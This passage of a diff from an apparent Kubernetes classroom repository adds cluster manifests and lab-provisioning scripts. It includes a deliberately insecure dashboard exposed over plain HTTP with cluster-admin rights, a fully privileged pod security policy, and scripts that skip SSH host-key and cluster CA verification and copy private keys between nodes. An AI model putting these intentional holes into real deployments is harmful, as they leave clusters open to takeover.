  namespace: kube-system
spec:
  ports:
  - port: 443
    targetPort: 8443
  selector:
    k8s-app: kubernetes-dashboard
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  labels:
    app: dashboard
  name: dashboard
spec:
  selector:
    matchLabels:
      app: dashboard
  template:
    metadata:
      labels:
        app: dashboard
    spec:
      containers:
      - args:
        - sh
        - -c
        - apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard.kube-system:443,verify=0
        image: alpine
        name: dashboard
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app: dashboard
  name: dashboard
spec:
  ports:
  - port: 80
    protocol: TCP
    targetPort: 80
  selector:
    app: dashboard
  type: NodePort
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
  name: kubernetes-dashboard
  labels:
    k8s-app: kubernetes-dashboard
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
- kind: ServiceAccount
  name: kubernetes-dashboard
  namespace: kube-system
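
As the file name warns, the socat deployment republishes the dashboard over plain HTTP on a NodePort, and the final ClusterRoleBinding grants its ServiceAccount cluster-admin; this is for classroom use only. To find where it ends up listening:

    kubectl apply -f k8s/insecure-dashboard.yaml
    kubectl get svc dashboard -o jsonpath='{.spec.ports[0].nodePort}'
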
k8s/local-path-storage.yaml (new file) · 110 lines

@@ -0,0 +1,110 @@
# This is a local copy of:
# https://github.com/rancher/local-path-provisioner/blob/master/deploy/local-path-storage.yaml
---
apiVersion: v1
kind: Namespace
metadata:
  name: local-path-storage
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: local-path-provisioner-service-account
  namespace: local-path-storage
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
  name: local-path-provisioner-role
  namespace: local-path-storage
rules:
- apiGroups: [""]
  resources: ["nodes", "persistentvolumeclaims"]
  verbs: ["get", "list", "watch"]
- apiGroups: [""]
  resources: ["endpoints", "persistentvolumes", "pods"]
  verbs: ["*"]
- apiGroups: [""]
  resources: ["events"]
  verbs: ["create", "patch"]
- apiGroups: ["storage.k8s.io"]
  resources: ["storageclasses"]
  verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
  name: local-path-provisioner-bind
  namespace: local-path-storage
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: local-path-provisioner-role
subjects:
- kind: ServiceAccount
  name: local-path-provisioner-service-account
  namespace: local-path-storage
---
apiVersion: apps/v1beta2
kind: Deployment
metadata:
  name: local-path-provisioner
  namespace: local-path-storage
spec:
  replicas: 1
  selector:
    matchLabels:
      app: local-path-provisioner
  template:
    metadata:
      labels:
        app: local-path-provisioner
    spec:
      serviceAccountName: local-path-provisioner-service-account
      containers:
      - name: local-path-provisioner
        image: rancher/local-path-provisioner:v0.0.8
        imagePullPolicy: Always
        command:
        - local-path-provisioner
        - --debug
        - start
        - --config
        - /etc/config/config.json
        volumeMounts:
        - name: config-volume
          mountPath: /etc/config/
        env:
        - name: POD_NAMESPACE
          valueFrom:
            fieldRef:
              fieldPath: metadata.namespace
      volumes:
      - name: config-volume
        configMap:
          name: local-path-config
---
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: local-path
provisioner: rancher.io/local-path
volumeBindingMode: WaitForFirstConsumer
reclaimPolicy: Delete
---
kind: ConfigMap
apiVersion: v1
metadata:
  name: local-path-config
  namespace: local-path-storage
data:
  config.json: |-
    {
      "nodePathMap":[
        {
          "node":"DEFAULT_PATH_FOR_NON_LISTED_NODES",
          "paths":["/opt/local-path-provisioner"]
        }
      ]
    }
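
Because the StorageClass uses WaitForFirstConsumer, a claim alone stays Pending until a pod uses it. A throwaway claim to exercise the provisioner (name and size are made up):

    kubectl apply -f k8s/local-path-storage.yaml
    kubectl apply -f - <<EOF
    apiVersion: v1
    kind: PersistentVolumeClaim
    metadata:
      name: test-local-path
    spec:
      accessModes: [ ReadWriteOnce ]
      storageClassName: local-path
      resources:
        requests:
          storage: 128Mi
    EOF
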
k8s/metrics-server.yaml (new file) · 138 lines

@@ -0,0 +1,138 @@
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: system:aggregated-metrics-reader
  labels:
    rbac.authorization.k8s.io/aggregate-to-view: "true"
    rbac.authorization.k8s.io/aggregate-to-edit: "true"
    rbac.authorization.k8s.io/aggregate-to-admin: "true"
rules:
- apiGroups: ["metrics.k8s.io"]
  resources: ["pods"]
  verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
  name: metrics-server:system:auth-delegator
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: system:auth-delegator
subjects:
- kind: ServiceAccount
  name: metrics-server
  namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: RoleBinding
metadata:
  name: metrics-server-auth-reader
  namespace: kube-system
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: extension-apiserver-authentication-reader
subjects:
- kind: ServiceAccount
  name: metrics-server
  namespace: kube-system
---
apiVersion: apiregistration.k8s.io/v1beta1
kind: APIService
metadata:
  name: v1beta1.metrics.k8s.io
spec:
  service:
    name: metrics-server
    namespace: kube-system
  group: metrics.k8s.io
  version: v1beta1
  insecureSkipTLSVerify: true
  groupPriorityMinimum: 100
  versionPriority: 100
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: metrics-server
  namespace: kube-system
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  name: metrics-server
  namespace: kube-system
  labels:
    k8s-app: metrics-server
spec:
  selector:
    matchLabels:
      k8s-app: metrics-server
  template:
    metadata:
      name: metrics-server
      labels:
        k8s-app: metrics-server
    spec:
      serviceAccountName: metrics-server
      volumes:
      # mount in tmp so we can safely use from-scratch images and/or read-only containers
      - name: tmp-dir
        emptyDir: {}
      containers:
      - name: metrics-server
        image: k8s.gcr.io/metrics-server-amd64:v0.3.1
        imagePullPolicy: Always
        volumeMounts:
        - name: tmp-dir
          mountPath: /tmp
        args:
        - --kubelet-preferred-address-types=InternalIP
        - --kubelet-insecure-tls
        - --metric-resolution=5s

---
apiVersion: v1
kind: Service
metadata:
  name: metrics-server
  namespace: kube-system
  labels:
    kubernetes.io/name: "Metrics-server"
spec:
  selector:
    k8s-app: metrics-server
  ports:
  - port: 443
    protocol: TCP
    targetPort: 443
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: system:metrics-server
rules:
- apiGroups:
  - ""
  resources:
  - pods
  - nodes
  - nodes/stats
  verbs:
  - get
  - list
  - watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: system:metrics-server
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: system:metrics-server
subjects:
- kind: ServiceAccount
  name: metrics-server
  namespace: kube-system
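
With --kubelet-insecure-tls and a 5-second metric resolution, this copy is tuned for training clusters rather than production. Once the APIService is ready, the metrics pipeline can be checked with:

    kubectl apply -f k8s/metrics-server.yaml
    kubectl top nodes   # should list per-node CPU/memory after a minute or so
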
k8s/persistent-consul.yaml (new file) · 95 lines

@@ -0,0 +1,95 @@
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: consul
rules:
- apiGroups: [ "" ]
  resources: [ pods ]
  verbs: [ get, list ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: consul
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: consul
subjects:
- kind: ServiceAccount
  name: consul
  namespace: orange
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: consul
---
apiVersion: v1
kind: Service
metadata:
  name: consul
spec:
  ports:
  - port: 8500
    name: http
  selector:
    app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
  name: consul
spec:
  serviceName: consul
  replicas: 3
  selector:
    matchLabels:
      app: consul
  volumeClaimTemplates:
  - metadata:
      name: data
    spec:
      accessModes:
      - ReadWriteOnce
      resources:
        requests:
          storage: 1Gi
  template:
    metadata:
      labels:
        app: consul
    spec:
      serviceAccountName: consul
      affinity:
        podAntiAffinity:
          requiredDuringSchedulingIgnoredDuringExecution:
          - labelSelector:
              matchExpressions:
              - key: app
                operator: In
                values:
                - consul
            topologyKey: kubernetes.io/hostname
      terminationGracePeriodSeconds: 10
      containers:
      - name: consul
        image: "consul:1.4.4"
        volumeMounts:
        - name: data
          mountPath: /consul/data
        args:
        - "agent"
        - "-bootstrap-expect=3"
        - "-retry-join=provider=k8s namespace=orange label_selector=\"app=consul\""
        - "-client=0.0.0.0"
        - "-data-dir=/consul/data"
        - "-server"
        - "-ui"
        lifecycle:
          preStop:
            exec:
              command:
              - /bin/sh
              - -c
              - consul leave
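
The volumeClaimTemplates here pair with the local PersistentVolumes defined in k8s/volumes-for-consul.yaml further down. A sketch of bringing the cluster up in the orange namespace that the RoleBinding and retry-join arguments expect:

    kubectl create namespace orange
    kubectl apply -f k8s/volumes-for-consul.yaml
    kubectl -n orange apply -f k8s/persistent-consul.yaml
    kubectl -n orange get pvc,pods -o wide
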
k8s/psp-privileged.yaml (new file) · 39 lines

@@ -0,0 +1,39 @@
---
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  name: privileged
  annotations:
    seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
spec:
  privileged: true
  allowPrivilegeEscalation: true
  allowedCapabilities:
  - '*'
  volumes:
  - '*'
  hostNetwork: true
  hostPorts:
  - min: 0
    max: 65535
  hostIPC: true
  hostPID: true
  runAsUser:
    rule: 'RunAsAny'
  seLinux:
    rule: 'RunAsAny'
  supplementalGroups:
    rule: 'RunAsAny'
  fsGroup:
    rule: 'RunAsAny'
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: psp:privileged
rules:
- apiGroups: ['policy']
  resources: ['podsecuritypolicies']
  verbs: ['use']
  resourceNames: ['privileged']
k8s/psp-restricted.yaml (new file) · 38 lines

@@ -0,0 +1,38 @@
---
apiVersion: extensions/v1beta1
kind: PodSecurityPolicy
metadata:
  annotations:
    apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
    apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
    seccomp.security.alpha.kubernetes.io/allowedProfileNames: docker/default
    seccomp.security.alpha.kubernetes.io/defaultProfileName: docker/default
  name: restricted
spec:
  allowPrivilegeEscalation: false
  fsGroup:
    rule: RunAsAny
  runAsUser:
    rule: RunAsAny
  seLinux:
    rule: RunAsAny
  supplementalGroups:
    rule: RunAsAny
  volumes:
  - configMap
  - emptyDir
  - projected
  - secret
  - downwardAPI
  - persistentVolumeClaim
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: psp:restricted
rules:
- apiGroups: ['policy']
  resources: ['podsecuritypolicies']
  verbs: ['use']
  resourceNames: ['restricted']
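
Neither policy does anything until the PodSecurityPolicy admission plugin is enabled and some subject is granted use of it through RBAC. Hypothetical bindings, privileged for kube-system and restricted for everyone else:

    kubectl -n kube-system create rolebinding psp-privileged \
        --clusterrole=psp:privileged --group=system:serviceaccounts:kube-system
    kubectl create clusterrolebinding psp-restricted \
        --clusterrole=psp:restricted --group=system:authenticated
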
k8s/users:jean.doe.yaml (new file) · 33 lines

@@ -0,0 +1,33 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: jean.doe
  namespace: users
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: users:jean.doe
rules:
- apiGroups: [ certificates.k8s.io ]
  resources: [ certificatesigningrequests ]
  verbs: [ create ]
- apiGroups: [ certificates.k8s.io ]
  resourceNames: [ users:jean.doe ]
  resources: [ certificatesigningrequests ]
  verbs: [ get, create, delete, watch ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: users:jean.doe
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: users:jean.doe
subjects:
- kind: ServiceAccount
  name: jean.doe
  namespace: users
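
The ClusterRole only lets the jean.doe ServiceAccount manage a CSR named users:jean.doe; the certificate flow itself happens outside this file. A sketch of that flow (file names and key size are made up, and an admin still has to approve):

    openssl req -newkey rsa:2048 -nodes -keyout jean.key -subj /CN=jean.doe -out jean.csr
    kubectl apply -f - <<EOF
    apiVersion: certificates.k8s.io/v1beta1
    kind: CertificateSigningRequest
    metadata:
      name: users:jean.doe
    spec:
      request: $(base64 -w0 < jean.csr)
      usages: [ digital signature, key encipherment, client auth ]
    EOF
    kubectl certificate approve users:jean.doe   # done by an admin
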
k8s/volumes-for-consul.yaml (new file) · 70 lines

@@ -0,0 +1,70 @@
---
apiVersion: v1
kind: PersistentVolume
metadata:
  name: consul-node2
  annotations:
    node: node2
spec:
  capacity:
    storage: 10Gi
  accessModes:
  - ReadWriteOnce
  persistentVolumeReclaimPolicy: Delete
  local:
    path: /mnt/consul
  nodeAffinity:
    required:
      nodeSelectorTerms:
      - matchExpressions:
        - key: kubernetes.io/hostname
          operator: In
          values:
          - node2
---
apiVersion: v1
kind: PersistentVolume
metadata:
  name: consul-node3
  annotations:
    node: node3
spec:
  capacity:
    storage: 10Gi
  accessModes:
  - ReadWriteOnce
  persistentVolumeReclaimPolicy: Delete
  local:
    path: /mnt/consul
  nodeAffinity:
    required:
      nodeSelectorTerms:
      - matchExpressions:
        - key: kubernetes.io/hostname
          operator: In
          values:
          - node3
---
apiVersion: v1
kind: PersistentVolume
metadata:
  name: consul-node4
  annotations:
    node: node4
spec:
  capacity:
    storage: 10Gi
  accessModes:
  - ReadWriteOnce
  persistentVolumeReclaimPolicy: Delete
  local:
    path: /mnt/consul
  nodeAffinity:
    required:
      nodeSelectorTerms:
      - matchExpressions:
        - key: kubernetes.io/hostname
          operator: In
          values:
          - node4
@@ -2,7 +2,7 @@ export AWS_DEFAULT_OUTPUT=text
|
||||
|
||||
HELP=""
|
||||
_cmd() {
|
||||
HELP="$(printf "%s\n%-12s %s\n" "$HELP" "$1" "$2")"
|
||||
HELP="$(printf "%s\n%-20s %s\n" "$HELP" "$1" "$2")"
|
||||
}
|
||||
|
||||
_cmd help "Show available commands"
|
||||
@@ -74,10 +74,10 @@ _cmd_deploy() {
|
||||
pssh -I sudo tee /usr/local/bin/docker-prompt <lib/docker-prompt
|
||||
pssh sudo chmod +x /usr/local/bin/docker-prompt
|
||||
|
||||
# If /home/docker/.ssh/id_rsa doesn't exist, copy it from node1
|
||||
# If /home/docker/.ssh/id_rsa doesn't exist, copy it from the first node
|
||||
pssh "
|
||||
sudo -u docker [ -f /home/docker/.ssh/id_rsa ] ||
|
||||
ssh -o StrictHostKeyChecking=no node1 sudo -u docker tar -C /home/docker -cvf- .ssh |
|
||||
ssh -o StrictHostKeyChecking=no \$(cat /etc/name_of_first_node) sudo -u docker tar -C /home/docker -cvf- .ssh |
|
||||
sudo -u docker tar -C /home/docker -xf-"
|
||||
|
||||
# if 'docker@' doesn't appear in /home/docker/.ssh/authorized_keys, copy it there
|
||||
@@ -86,11 +86,11 @@ _cmd_deploy() {
|
||||
cat /home/docker/.ssh/id_rsa.pub |
|
||||
sudo -u docker tee -a /home/docker/.ssh/authorized_keys"
|
||||
|
||||
# On node1, create and deploy TLS certs using Docker Machine
|
||||
# On the first node, create and deploy TLS certs using Docker Machine
|
||||
# (Currently disabled.)
|
||||
true || pssh "
|
||||
if grep -q node1 /tmp/node; then
|
||||
grep ' node' /etc/hosts |
|
||||
if i_am_first_node; then
|
||||
grep '[0-9]\$' /etc/hosts |
|
||||
xargs -n2 sudo -H -u docker \
|
||||
docker-machine create -d generic --generic-ssh-user docker --generic-ip-address
|
||||
fi"
|
||||
@@ -103,11 +103,62 @@ _cmd_deploy() {
|
||||
info "$0 cards $TAG"
|
||||
}
|
||||
|
||||
_cmd disabledocker "Stop Docker Engine and don't restart it automatically"
|
||||
_cmd_disabledocker() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
pssh "sudo systemctl disable docker.service"
|
||||
pssh "sudo systemctl disable docker.socket"
|
||||
pssh "sudo systemctl stop docker"
|
||||
}
|
||||
|
||||
_cmd kubebins "Install Kubernetes and CNI binaries but don't start anything"
|
||||
_cmd_kubebins() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
pssh --timeout 300 "
|
||||
set -e
|
||||
cd /usr/local/bin
|
||||
if ! [ -x etcd ]; then
|
||||
curl -L https://github.com/etcd-io/etcd/releases/download/v3.3.10/etcd-v3.3.10-linux-amd64.tar.gz \
|
||||
| sudo tar --strip-components=1 --wildcards -zx '*/etcd' '*/etcdctl'
|
||||
fi
|
||||
if ! [ -x hyperkube ]; then
|
||||
curl -L https://dl.k8s.io/v1.14.1/kubernetes-server-linux-amd64.tar.gz \
|
||||
| sudo tar --strip-components=3 -zx kubernetes/server/bin/hyperkube
|
||||
fi
|
||||
if ! [ -x kubelet ]; then
|
||||
for BINARY in kubectl kube-apiserver kube-scheduler kube-controller-manager kubelet kube-proxy;
|
||||
do
|
||||
sudo ln -s hyperkube \$BINARY
|
||||
done
|
||||
fi
|
||||
sudo mkdir -p /opt/cni/bin
|
||||
cd /opt/cni/bin
|
||||
if ! [ -x bridge ]; then
|
||||
curl -L https://github.com/containernetworking/plugins/releases/download/v0.7.5/cni-plugins-amd64-v0.7.5.tgz \
|
||||
| sudo tar -zx
|
||||
fi
|
||||
"
|
||||
}
|
||||
|
||||
_cmd kube "Setup kubernetes clusters with kubeadm (must be run AFTER deploy)"
|
||||
_cmd_kube() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
# Optional version, e.g. 1.13.5
|
||||
KUBEVERSION=$2
|
||||
if [ "$KUBEVERSION" ]; then
|
||||
EXTRA_KUBELET="=$KUBEVERSION-00"
|
||||
EXTRA_KUBEADM="--kubernetes-version=v$KUBEVERSION"
|
||||
else
|
||||
EXTRA_KUBELET=""
|
||||
EXTRA_KUBEADM=""
|
||||
fi
|
||||
|
||||
# Install packages
|
||||
pssh --timeout 200 "
|
||||
curl -s https://packages.cloud.google.com/apt/doc/apt-key.gpg |
|
||||
@@ -116,19 +167,19 @@ _cmd_kube() {
|
||||
sudo tee /etc/apt/sources.list.d/kubernetes.list"
|
||||
pssh --timeout 200 "
|
||||
sudo apt-get update -q &&
|
||||
sudo apt-get install -qy kubelet kubeadm kubectl &&
|
||||
sudo apt-get install -qy kubelet$EXTRA_KUBELET kubeadm kubectl &&
|
||||
kubectl completion bash | sudo tee /etc/bash_completion.d/kubectl"
|
||||
|
||||
# Initialize kube master
|
||||
pssh --timeout 200 "
|
||||
if grep -q node1 /tmp/node && [ ! -f /etc/kubernetes/admin.conf ]; then
|
||||
if i_am_first_node && [ ! -f /etc/kubernetes/admin.conf ]; then
|
||||
kubeadm token generate > /tmp/token &&
|
||||
sudo kubeadm init --token \$(cat /tmp/token)
|
||||
sudo kubeadm init $EXTRA_KUBEADM --token \$(cat /tmp/token) --apiserver-cert-extra-sans \$(cat /tmp/ipv4)
|
||||
fi"
|
||||
|
||||
# Put kubeconfig in ubuntu's and docker's accounts
|
||||
pssh "
|
||||
if grep -q node1 /tmp/node; then
|
||||
if i_am_first_node; then
|
||||
sudo mkdir -p \$HOME/.kube /home/docker/.kube &&
|
||||
sudo cp /etc/kubernetes/admin.conf \$HOME/.kube/config &&
|
||||
sudo cp /etc/kubernetes/admin.conf /home/docker/.kube/config &&
|
||||
@@ -138,16 +189,23 @@ _cmd_kube() {
|
||||
|
||||
# Install weave as the pod network
|
||||
pssh "
|
||||
if grep -q node1 /tmp/node; then
|
||||
if i_am_first_node; then
|
||||
kubever=\$(kubectl version | base64 | tr -d '\n') &&
|
||||
kubectl apply -f https://cloud.weave.works/k8s/net?k8s-version=\$kubever
|
||||
fi"
|
||||
|
||||
# Join the other nodes to the cluster
|
||||
pssh --timeout 200 "
|
||||
if ! grep -q node1 /tmp/node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
|
||||
TOKEN=\$(ssh -o StrictHostKeyChecking=no node1 cat /tmp/token) &&
|
||||
sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN node1:6443
|
||||
if ! i_am_first_node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
|
||||
FIRSTNODE=\$(cat /etc/name_of_first_node) &&
|
||||
TOKEN=\$(ssh -o StrictHostKeyChecking=no \$FIRSTNODE cat /tmp/token) &&
|
||||
sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN \$FIRSTNODE:6443
|
||||
fi"
|
||||
|
||||
# Install metrics server
|
||||
pssh "
|
||||
if i_am_first_node; then
|
||||
kubectl apply -f https://raw.githubusercontent.com/jpetazzo/container.training/master/k8s/metrics-server.yaml
|
||||
fi"
|
||||
|
||||
# Install kubectx and kubens
|
||||
@@ -171,7 +229,7 @@ EOF"
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/stern ]; then
|
||||
##VERSION##
|
||||
sudo curl -L -o /usr/local/bin/stern https://github.com/wercker/stern/releases/download/1.10.0/stern_linux_amd64 &&
|
||||
sudo curl -L -o /usr/local/bin/stern https://github.com/wercker/stern/releases/download/1.11.0/stern_linux_amd64 &&
|
||||
sudo chmod +x /usr/local/bin/stern &&
|
||||
stern --completion bash | sudo tee /etc/bash_completion.d/stern
|
||||
fi"
|
||||
@@ -183,6 +241,21 @@ EOF"
|
||||
helm completion bash | sudo tee /etc/bash_completion.d/helm
|
||||
fi"
|
||||
|
||||
# Install ship
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/ship ]; then
|
||||
curl -L https://github.com/replicatedhq/ship/releases/download/v0.40.0/ship_0.40.0_linux_amd64.tar.gz |
|
||||
sudo tar -C /usr/local/bin -zx ship
|
||||
fi"
|
||||
|
||||
# Install the AWS IAM authenticator
|
||||
pssh "
|
||||
if [ ! -x /usr/local/bin/aws-iam-authenticator ]; then
|
||||
##VERSION##
|
||||
sudo curl -o /usr/local/bin/aws-iam-authenticator https://amazon-eks.s3-us-west-2.amazonaws.com/1.12.7/2019-03-27/bin/linux/amd64/aws-iam-authenticator
|
||||
sudo chmod +x /usr/local/bin/aws-iam-authenticator
|
||||
fi"
|
||||
|
||||
sep "Done"
|
||||
}
|
||||
|
||||
@@ -203,10 +276,9 @@ _cmd_kubetest() {
|
||||
# Feel free to make that better ♥
|
||||
pssh "
|
||||
set -e
|
||||
[ -f /tmp/node ]
|
||||
if grep -q node1 /tmp/node; then
|
||||
if i_am_first_node; then
|
||||
which kubectl
|
||||
for NODE in \$(awk /\ node/\ {print\ \\\$2} /etc/hosts); do
|
||||
for NODE in \$(awk /[0-9]\$/\ {print\ \\\$2} /etc/hosts); do
|
||||
echo \$NODE ; kubectl get nodes | grep -w \$NODE | grep -w Ready
|
||||
done
|
||||
fi"
|
||||
@@ -246,6 +318,14 @@ _cmd_listall() {
done
}

_cmd ping "Ping VMs in a given tag, to check that they have network access"
_cmd_ping() {
TAG=$1
need_tag

fping < tags/$TAG/ips.txt
}

_cmd netfix "Disable GRO and run a pinger job on the VMs"
_cmd_netfix () {
TAG=$1
@@ -277,6 +357,14 @@ _cmd_opensg() {
infra_opensg
}

_cmd disableaddrchecks "Disable source/destination IP address checks"
_cmd_disableaddrchecks() {
TAG=$1
need_tag

infra_disableaddrchecks
}

_cmd pssh "Run an arbitrary command on all nodes"
_cmd_pssh() {
TAG=$1
@@ -311,6 +399,15 @@ _cmd_retag() {
aws_tag_instances $OLDTAG $NEWTAG
}

_cmd ssh "Open an SSH session to the first node of a tag"
_cmd_ssh() {
TAG=$1
need_tag
IP=$(head -1 tags/$TAG/ips.txt)
info "Logging into $IP"
ssh docker@$IP
}

_cmd start "Start a group of VMs"
_cmd_start() {
while [ ! -z "$*" ]; do
@@ -322,7 +419,7 @@ _cmd_start() {
*) die "Unrecognized parameter: $1."
esac
done

if [ -z "$INFRA" ]; then
die "Please add --infra flag to specify which infrastructure file to use."
fi
@@ -333,8 +430,8 @@ _cmd_start() {
COUNT=$(awk '/^clustersize:/ {print $2}' $SETTINGS)
warning "No --count option was specified. Using value from settings file ($COUNT)."
fi

# Check that the specified settings and infrastructure are valid.
need_settings $SETTINGS
need_infra $INFRA
@@ -406,15 +503,15 @@ _cmd_helmprom() {
TAG=$1
need_tag
pssh "
-if grep -q node1 /tmp/node; then
+if i_am_first_node; then
kubectl -n kube-system get serviceaccount helm ||
kubectl -n kube-system create serviceaccount helm
-helm init --service-account helm
+sudo -u docker -H helm init --service-account helm
kubectl get clusterrolebinding helm-can-do-everything ||
kubectl create clusterrolebinding helm-can-do-everything \
--clusterrole=cluster-admin \
--serviceaccount=kube-system:helm
-helm upgrade --install prometheus stable/prometheus \
+sudo -u docker -H helm upgrade --install prometheus stable/prometheus \
--namespace kube-system \
--set server.service.type=NodePort \
--set server.service.nodePort=30090 \
@@ -439,6 +536,38 @@ _cmd_weavetest() {
sh -c \"./weave --local status | grep Connections | grep -q ' 1 failed' || ! echo POD \""
}

_cmd webssh "Install a WEB SSH server on the machines (port 1080)"
_cmd_webssh() {
TAG=$1
need_tag
pssh "
sudo apt-get update &&
sudo apt-get install python-tornado python-paramiko -y"
pssh "
[ -d webssh ] || git clone https://github.com/jpetazzo/webssh"
pssh "
for KEYFILE in /etc/ssh/*.pub; do
read a b c < \$KEYFILE; echo localhost \$a \$b
done > webssh/known_hosts"
pssh "cat >webssh.service <<EOF
[Unit]
Description=webssh

[Install]
WantedBy=multi-user.target

[Service]
WorkingDirectory=/home/ubuntu/webssh
ExecStart=/usr/bin/env python run.py --fbidhttp=false --port=1080 --policy=reject
User=nobody
Group=nogroup
Restart=always
EOF"
pssh "
sudo systemctl enable \$PWD/webssh.service &&
sudo systemctl start webssh.service"
}
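One detail worth calling out in `_cmd_webssh`: `systemctl enable` is given an absolute path (`\$PWD/webssh.service`) instead of a unit name. systemd links that file into its search path, so a unit kept in a home directory still starts at boot. A quick sanity check, as a sketch:

```bash
# After enabling by absolute path, the unit behaves like any other service.
systemctl status webssh.service
systemctl is-enabled webssh.service
```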
greet() {
IAMUSER=$(aws iam get-user --query 'User.UserName')
info "Hello! You seem to be UNIX user $USER, and IAM user $IAMUSER."
@@ -496,8 +625,8 @@ test_vm() {
for cmd in "hostname" \
"whoami" \
"hostname -i" \
-"cat /tmp/node" \
-"cat /tmp/ipv4" \
+"ls -l /usr/local/bin/i_am_first_node" \
+"grep . /etc/name_of_first_node /etc/ipv4_of_first_node" \
"cat /etc/hosts" \
"hostnamectl status" \
"docker version | grep Version -B1" \
@@ -24,3 +24,7 @@ infra_quotas() {
infra_opensg() {
warning "infra_opensg is unsupported on $INFRACLASS."
}

+infra_disableaddrchecks() {
+warning "infra_disableaddrchecks is unsupported on $INFRACLASS."
+}
@@ -31,6 +31,7 @@ infra_start() {
die "I could not find which AMI to use in this region. Try another region?"
fi
AWS_KEY_NAME=$(make_key_name)
+AWS_INSTANCE_TYPE=${AWS_INSTANCE_TYPE-t3a.medium}

sep "Starting instances"
info " Count: $COUNT"
@@ -38,10 +39,11 @@ infra_start() {
info " Token/tag: $TAG"
info " AMI: $AMI"
info " Key name: $AWS_KEY_NAME"
+info " Instance type: $AWS_INSTANCE_TYPE"
result=$(aws ec2 run-instances \
--key-name $AWS_KEY_NAME \
--count $COUNT \
---instance-type ${AWS_INSTANCE_TYPE-t2.medium} \
+--instance-type $AWS_INSTANCE_TYPE \
--client-token $TAG \
--block-device-mapping 'DeviceName=/dev/sda1,Ebs={VolumeSize=20}' \
--image-id $AMI)
@@ -88,8 +90,16 @@ infra_opensg() {
--cidr 0.0.0.0/0
}

+infra_disableaddrchecks() {
+IDS=$(aws_get_instance_ids_by_tag $TAG)
+for ID in $IDS; do
+info "Disabling source/destination IP checks on: $ID"
+aws ec2 modify-instance-attribute --source-dest-check "{\"Value\": false}" --instance-id $ID
+done
+}

wait_until_tag_is_running() {
-max_retry=50
+max_retry=100
i=0
done_count=0
while [[ $done_count -lt $COUNT ]]; do
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
import os
import sys
import yaml

@@ -12,6 +12,7 @@ config = yaml.load(open("/tmp/settings.yaml"))
COMPOSE_VERSION = config["compose_version"]
MACHINE_VERSION = config["machine_version"]
CLUSTER_SIZE = config["clustersize"]
+CLUSTER_PREFIX = config["clusterprefix"]
ENGINE_VERSION = config["engine_version"]
DOCKER_USER_PASSWORD = config["docker_user_password"]

@@ -121,7 +122,7 @@ addresses = list(l.strip() for l in sys.stdin)
assert ipv4 in addresses

def makenames(addrs):
-    return [ "node%s"%(i+1) for i in range(len(addrs)) ]
+    return [ "%s%s"%(CLUSTER_PREFIX, i+1) for i in range(len(addrs)) ]

while addresses:
cluster = addresses[:CLUSTER_SIZE]
@@ -135,15 +136,21 @@ while addresses:
print(cluster)

mynode = cluster.index(ipv4) + 1
system("echo node{} | sudo -u docker tee /tmp/node".format(mynode))
-system("echo node{} | sudo tee /etc/hostname".format(mynode))
-system("sudo hostname node{}".format(mynode))
+system("echo {}{} | sudo tee /etc/hostname".format(CLUSTER_PREFIX, mynode))
+system("sudo hostname {}{}".format(CLUSTER_PREFIX, mynode))
system("sudo -u docker mkdir -p /home/docker/.ssh")
system("sudo -u docker touch /home/docker/.ssh/authorized_keys")

+# Create a convenience file to easily check if we're the first node
if ipv4 == cluster[0]:
-# If I'm node1 and don't have a private key, generate one (with empty passphrase)
+system("sudo ln -sf /bin/true /usr/local/bin/i_am_first_node")
+# On the first node, if we don't have a private key, generate one (with empty passphrase)
